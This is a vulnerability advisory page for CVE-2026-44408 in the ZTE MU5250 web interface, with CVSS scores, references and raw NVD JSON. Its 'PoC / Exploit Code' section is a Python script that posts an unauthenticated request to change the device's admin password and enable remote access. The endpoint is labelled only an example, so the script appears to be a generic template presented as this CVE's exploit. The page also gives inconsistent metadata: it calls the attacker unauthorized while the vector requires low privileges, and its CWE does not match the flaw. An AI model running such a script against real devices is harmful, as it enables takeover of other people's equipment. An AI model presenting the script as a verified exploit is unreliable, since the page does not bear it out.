CVE-2026-44408

Description

There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can modify configuration through the interface.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

ZTE MU5250 (具体受影响固件版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration URL (Example endpoint)
target_url = "http://<target_ip>/cgi-bin/config_handler"

# Attacker-controlled payload to modify device configuration
# For example, changing the SSID or admin password
payload = {
    "action": "modify",
    "admin_password": "attacker_controlled_password",
    "remote_access": "enabled"
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    # Send the request without valid session cookies or authentication tokens
    response = requests.post(target_url, data=payload, headers=headers, timeout=10, verify=False)

    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] Exploit successful! Configuration has been modified.")
    else:
        print(f"[-] Exploit failed. Server responded with: {response.status_code}")
        print(response.text)

except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44408
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44408
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44408/
[4] VulDB https://vuldb.com/cve/CVE-2026-44408
[5] https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44408", "sourceIdentifier": "[email protected]", "published": "2026-05-19T09:16:20.020", "lastModified": "2026-05-19T14:50:07.413", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can modify configuration through the interface."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158", "source": "[email protected]"}]}}